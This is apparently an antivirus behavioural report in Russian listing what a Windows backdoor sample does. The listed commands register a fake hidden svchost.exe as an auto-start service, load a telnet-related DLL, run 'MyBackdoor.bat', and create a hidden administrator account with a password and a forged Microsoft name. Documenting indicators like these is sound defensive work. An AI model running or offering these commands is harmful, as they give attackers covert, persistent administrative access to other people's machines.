Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\WMA-Client] 'Start' = '00000002'
- <SYSTEM32>\svchost.exe
- <SYSTEM32>\svchost.exe /service
- <SYSTEM32>\sc.exe description WMA-Client "Microsoft WMA-Client"
- <SYSTEM32>\sc.exe create "WMA-Client" binpath= "<SYSTEM32>\svchost.exe " start= auto
- %WINDIR%\regedit.exe /s r0.reg
- <SYSTEM32>\sc.exe start WMA-Client
- <SYSTEM32>\rundll32.exe user.dll,Message
- <SYSTEM32>\attrib.exe +r +s +h <SYSTEM32>\"svchost.exe "
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\net1.exe localgroup %USERNAME%s SUPPORT_3998a0 /add
- <SYSTEM32>\net1.exe user SUPPORT_3998a0 i*hXim /add /fullname:"CN=Microsoft Corporation,L=Redmond"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\MyBackdoor.bat" "
- <SYSTEM32>\net1.exe localgroup Users SUPPORT_3998a0 /delete
- <SYSTEM32>\net1.exe accounts /maxpwage:unlimited
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_3998a0 /delete
- <SYSTEM32>\net1.exe localgroup Администраторы SUPPORT_3998a0 /add
- <SYSTEM32>\r0.reg
- <SYSTEM32>\svchost.exe
- %TEMP%\1.tmp\MyBackdoor.bat
- %TEMP%\1.tmp\b2e
- %TEMP%\1.tmp\binaries.txt
- <SYSTEM32>\svchost.exe
- <SYSTEM32>\r0.reg
- %TEMP%\1.tmp\b2e
- %TEMP%\1.tmp\binaries.txt
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'RegEdit_RegEdit' WindowName: ''